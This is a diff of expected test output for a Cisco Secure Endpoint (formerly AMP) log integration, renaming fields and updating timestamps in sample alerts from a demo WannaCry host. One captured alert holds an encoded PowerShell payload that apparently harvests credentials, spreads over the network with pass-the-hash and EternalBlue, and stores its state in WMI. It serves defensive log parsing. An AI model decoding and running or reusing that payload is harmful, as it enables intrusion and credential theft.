AJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}",
                 "id": "6880683125978957000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "bp_data": {
                         "severity": "medium",
                         "start_ts": 1610640884,
@@ -2577,11 +2586,6 @@
                             "be:b0:d5:89:e2:96"
                         ]
                     },
-                    "mitre_tactics": [
-                        "TA0002",
-                        "TA0005",
-                        "TA0008"
-                    ],
                     "group_guids": [
                         "test_group_guid"
                     ],
@@ -2620,7 +2624,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111198245Z",
+                "ingested": "2021-09-27T00:41:58.139873940Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2630,7 +2634,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2695,7 +2699,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111200321Z",
+                "ingested": "2021-09-27T00:41:58.139875674Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2705,7 +2709,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2770,7 +2774,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111202401Z",
+                "ingested": "2021-09-27T00:41:58.139877427Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2780,7 +2784,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2845,7 +2849,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111204552Z",
+                "ingested": "2021-09-27T00:41:58.139879258Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2855,7 +2859,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2926,7 +2930,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111206627Z",
+                "ingested": "2021-09-27T00:41:58.139881018Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2937,7 +2941,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -3005,7 +3009,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111208689Z",
+                "ingested": "2021-09-27T00:41:58.139882747Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3016,7 +3020,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -3084,7 +3088,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111210770Z",
+                "ingested": "2021-09-27T00:41:58.139884490Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3095,7 +3099,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -3163,7 +3167,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111212848Z",
+                "ingested": "2021-09-27T00:41:58.139886210Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective 